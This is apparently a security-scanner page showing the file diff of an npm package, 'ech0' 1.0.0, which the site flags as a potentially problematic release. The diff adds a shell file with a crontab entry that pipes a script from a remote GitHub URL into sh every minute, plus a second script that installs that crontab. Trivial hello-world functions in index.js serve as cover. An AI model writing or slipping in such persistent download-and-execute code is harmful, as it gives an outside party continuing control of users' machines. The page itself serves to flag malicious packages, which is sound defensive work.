ech0 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of ech0 might be problematic. Click here for more details.
- package/c.sh +1 -0
- package/echo.sh +1 -0
- package/index.js +17 -0
- package/package.json +12 -0
package/c.sh
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
* * * * * curl https://github.com/foyoh/update/blob/main/1.sh | sh
|
package/echo.sh
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
crontab c.sh
|
package/index.js
ADDED
@@ -0,0 +1,17 @@
|
|
1
|
+
function helloWorld () {
|
2
|
+
console.log('Hello World!');
|
3
|
+
}
|
4
|
+
|
5
|
+
function doSomethingAwesome () {
|
6
|
+
console.log('Doing something awesome...');
|
7
|
+
}
|
8
|
+
|
9
|
+
function doSomethingElse () {
|
10
|
+
console.log('Now something else...');
|
11
|
+
}
|
12
|
+
|
13
|
+
module.exports = {
|
14
|
+
helloWorld: helloWorld,
|
15
|
+
doSomethingAwesome: doSomethingAwesome,
|
16
|
+
doSomethingElse: doSomethingElse
|
17
|
+
}
|
package/package.json
ADDED